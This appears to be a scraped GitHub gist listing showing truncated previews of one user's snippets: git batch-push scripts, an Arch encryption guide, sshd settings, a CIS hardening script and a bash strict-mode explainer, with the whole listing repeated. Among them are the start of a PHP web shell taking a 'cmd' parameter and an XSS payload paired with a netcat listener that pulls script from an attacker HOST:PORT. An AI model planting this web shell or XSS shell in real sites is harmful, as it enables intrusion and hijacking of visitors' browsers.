Pranay Pawar Bugaddr

## push_commits_by_chunks.sh
REMOTE=origin
BRANCH=$(git rev-parse --abbrev-ref HEAD)
BATCH_SIZE=10

# check if the branch exists on the remote
# if git show-ref --quiet --verify refs/remotes/$REMOTE/$BRANCH; then
#     # if so, only push the commits that are not on the remote already
#     range=$REMOTE/$BRANCH..HEAD
# else
#     # else push all the commits

## full-disk-encryption-arch-uefi.md

      
              1 file
            
          
              84 forks
            
          
                50 comments
              
            
              413 stars
            
          
                huntrar
                / full-disk-encryption-arch-uefi.md
            
            
              Last active
              November 22, 2025 14:47
            
              
                Arch Linux Full-Disk Encryption Installation Guide [Encrypted Boot, UEFI, NVMe, Evil Maid]
              
          
    Arch Linux Full-Disk Encryption Installation Guide

This guide provides instructions for an Arch Linux installation featuring full-disk encryption via LVM on LUKS and an encrypted boot partition (GRUB) for UEFI systems.
Following the main installation are further instructions to harden against Evil Maid attacks via UEFI Secure Boot custom key enrollment and self-signed kernel and bootloader.
Preface

You will find most of this information pulled from the Arch Wiki and other resources linked thereof.
Note: The system was installed on an NVMe SSD, substitute /dev/nvme0nX with /dev/sdX or your device as needed.

  
## attributes.rb
default['sshd']['sshd_config']['AuthenticationMethods'] = 'publickey,keyboard-interactive:pam'
default['sshd']['sshd_config']['ChallengeResponseAuthentication'] = 'yes'
default['sshd']['sshd_config']['PasswordAuthentication'] = 'no'

## git-split-and-push.sh
# Split a repository into batches to avoid `pack exceeds maximum allowed size` on git push

REMOTE=origin
BRANCH=$(git rev-parse --abbrev-ref HEAD)
BATCH_SIZE=500

# check if the branch exists on the remote
if git show-ref --quiet --verify refs/remotes/$REMOTE/$BRANCH; then
    # if so, only push the commits that are not on the remote already
    range=$REMOTE/$BRANCH..HEAD

## centos7_cis.sh
#!/bin/sudo bash
PROFILE="Level 1 - Server"

if [ "$PROFILE" = "Level 1 - Server" ] || [ "$PROFILE" = "Level 2 - Server" ]; then
  echo \*\*\*\* Executing Level 1 - Server profile remediation

  # Ensure mounting of cramfs filesystems is disabled
  echo
  echo \*\*\*\* Ensure\ mounting\ of\ cramfs\ filesystems\ is\ disabled
  modprobe -n -v cramfs | grep "^install /bin/true$" || echo "install cramfs /bin/true" >> /etc/modprobe.d/CIS.conf

## bash_strict_mode.md

      
              1 file
            
          
              249 forks
            
          
                73 comments
              
            
              1704 stars
            
          
                mohanpedala
                / bash_strict_mode.md
            
            
              Last active
              December 5, 2025 10:58
            
              
                set -e, -u, -o, -x pipefail explanation
              
          
    Table of Contents


set -e, -u, -x, -o pipefail
set -e
set -x
set -u
set -o pipefail
Setting IFS
Original Reference

set -e, -u, -x, -o pipefail


## easy-simple-php-webshell.php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {

## keycode.linux
# /usr/share/BasiliskII/keycodes
#
# Basilisk II (C) 1997-2005 Christian Bauer
#
# This file is used to translate the (server-specific) scancodes to
# Mac keycodes depending on the window server being used.
#
# The format of this file is as follows:
#
# sdl <driver string>

## xss_shell.txt
Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>

## proxy-scraper.sh
#!/bin/bash
# HR Proxy Scraper Script
# Rebuilded By Kyxrec0n
# Demo video : youtube.com/watch?v=iXCeR_XsP6o
# USAGE: ./proxy-scraper.sh <ARGUMENT> <OPTIONS>
# ARGUMENTS:
#	Proxy Checker - Single Proxy Check
#	        -s <IP>:<PORT>
#
#	Proxy Checker - List Scan:
	REMOTE=origin
	BRANCH=$(git rev-parse --abbrev-ref HEAD)
	BATCH_SIZE=10

	# check if the branch exists on the remote
	# if git show-ref --quiet --verify refs/remotes/$REMOTE/$BRANCH; then
	# # if so, only push the commits that are not on the remote already
	# range=$REMOTE/$BRANCH..HEAD
	# else
	# # else push all the commits
	default['sshd']['sshd_config']['AuthenticationMethods'] = 'publickey,keyboard-interactive:pam'
	default['sshd']['sshd_config']['ChallengeResponseAuthentication'] = 'yes'
	default['sshd']['sshd_config']['PasswordAuthentication'] = 'no'
	# Split a repository into batches to avoid `pack exceeds maximum allowed size` on git push

	REMOTE=origin
	BRANCH=$(git rev-parse --abbrev-ref HEAD)
	BATCH_SIZE=500

	# check if the branch exists on the remote
	if git show-ref --quiet --verify refs/remotes/$REMOTE/$BRANCH; then
	# if so, only push the commits that are not on the remote already
	range=$REMOTE/$BRANCH..HEAD
	#!/bin/sudo bash
	PROFILE="Level 1 - Server"

	if [ "$PROFILE" = "Level 1 - Server" ] \|\| [ "$PROFILE" = "Level 2 - Server" ]; then
	echo \\\\ Executing Level 1 - Server profile remediation

	# Ensure mounting of cramfs filesystems is disabled
	echo
	echo \\\\ Ensure\ mounting\ of\ cramfs\ filesystems\ is\ disabled
	modprobe -n -v cramfs \| grep "^install /bin/true$" \|\| echo "install cramfs /bin/true" >> /etc/modprobe.d/CIS.conf
	<html>
	<body>
	<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
	<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
	<input type="SUBMIT" value="Execute">
	</form>
	<pre>
	<?php
	if(isset($_GET['cmd']))
	{
	# /usr/share/BasiliskII/keycodes
	#
	# Basilisk II (C) 1997-2005 Christian Bauer
	#
	# This file is used to translate the (server-specific) scancodes to
	# Mac keycodes depending on the window server being used.
	#
	# The format of this file is as follows:
	#
	# sdl <driver string>
	Attacker: while :; do printf "j$ "; read c; echo $c \| nc -lp PORT >/dev/null; done
	Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>
	#!/bin/bash
	# HR Proxy Scraper Script
	# Rebuilded By Kyxrec0n
	# Demo video : youtube.com/watch?v=iXCeR_XsP6o
	# USAGE: ./proxy-scraper.sh <ARGUMENT> <OPTIONS>
	# ARGUMENTS:
	# Proxy Checker - Single Proxy Check
	# -s <IP>:<PORT>
	#
	# Proxy Checker - List Scan: